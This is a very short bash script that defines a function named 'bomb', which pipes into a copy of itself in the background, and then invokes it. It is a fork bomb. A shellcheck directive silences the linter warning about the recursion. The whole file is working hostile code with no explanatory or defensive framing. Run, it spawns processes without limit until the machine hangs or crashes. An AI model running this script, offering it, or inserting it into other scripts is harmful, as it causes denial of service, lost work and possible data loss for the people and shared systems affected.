#!/bin/bash

bomb() { 
  #shellcheck disable=SC2264
  bomb | bomb &
}; bomb
